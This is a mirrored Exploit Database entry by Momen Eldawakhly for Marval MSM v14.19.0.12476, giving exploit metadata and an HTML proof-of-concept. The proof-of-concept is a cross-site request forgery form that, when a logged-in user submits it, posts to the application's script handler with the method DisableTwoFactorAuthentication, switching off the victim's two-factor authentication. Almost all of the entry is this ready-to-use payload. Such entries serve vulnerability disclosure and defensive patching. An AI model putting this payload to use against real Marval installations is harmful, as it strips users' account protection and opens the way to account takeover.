Marval MSM v14.19.0.12476 – Cross-Site Request Forgery (CSRF)

• Exploit Database
• 16 阅读

• 作者： Momen Eldawakhly
  日期： 2022-06-14
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/50957/

• # Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
  # Date: 27/5/2022
  # Exploit Author: Momen Eldawakhly (Cyber Guy)
  # Vendor Homepage: https://www.marvalnorthamerica.com/
  # Software Link: https://www.marvalnorthamerica.com/
  # Version: v14.19.0.12476
  # Tested on: Windows
  # PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY
  # 2FA Bypass:
  
  <html>
  
  <body>
  <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain">
  <input type="submit" value="Submit request" />
  </form>
  </body>
  </html>